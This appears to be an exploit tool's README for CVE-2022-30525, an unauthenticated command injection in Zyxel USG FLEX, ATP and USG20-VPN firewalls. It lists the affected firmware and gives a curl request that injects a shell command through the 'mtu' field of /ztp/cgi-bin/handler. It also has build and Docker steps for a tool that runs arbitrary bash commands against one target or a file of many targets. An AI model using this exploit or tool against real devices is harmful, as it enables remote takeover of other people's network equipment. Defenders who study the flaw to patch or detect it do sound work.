Rapid7 discovered and reported a vulnerability that affects Zyxel firewalls supporting Zero Touch Provisioning (ZTP), which includes the ATP series, VPN series, and the USG FLEX series (including USG20-VPN and USG20W-VPN). The vulnerability, identified as CVE-2022-30525, allows an unauthenticated and remote attacker to achieve arbitrary code execution as the nobody user on the affected device.

The following table contains the affected models and firmware versions.

Affected Model USG FLEX 100, 100W, 200, 500, 700 ZLD5.00 thru ZLD5.21 Patch 1 USG20-VPN, USG20W-VPN ZLD5.10 thru ZLD5.21 Patch 1 ATP 100, 200, 500, 700, 800 ZLD5.10 thru ZLD5.21 Patch 1 The VPN series, which also supports ZTP, is not vulnerable because it does not support the required functionality.

The affected models are vulnerable to unauthenticated and remote command injection via the administrative HTTP interface. Commands are executed as the nobody user. This vulnerability is exploited through the /ztp/cgi-bin/handler URI.

curl -v --insecure -X POST -H "Content-Type: application/json" -d
'{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged"
:"1","vlanid":"5","mtu":"; ping 192.168.1.220;","data":"hi"}'
https://192.168.1.1/ztp/cgi-bin/handler

There should be a cmds file created where you can add commands to be executed via the program in the next format:

bash -c "command#1 && command#2 && etc."

For example:
bash -c "ping 8.8.8.8"

Golang

1. git clone https://github.com/iveresk/cve-2022-30525.git
2. cd cve-2022-30525
3. go build cve-2022-30525.go -o /cve-2022-30525
4. chmod +x cve-2022-30525
5. ./cve-2022-30525 -t <targetURL> [or <targetFile>]

Dockerfile

docker run -it -e INPUT_FILE=<file_name> masterrooot/cve-30525

Where is INPUT_FILE is a target URL or file with list of targets.

You are free to contact me via Keybase for any details.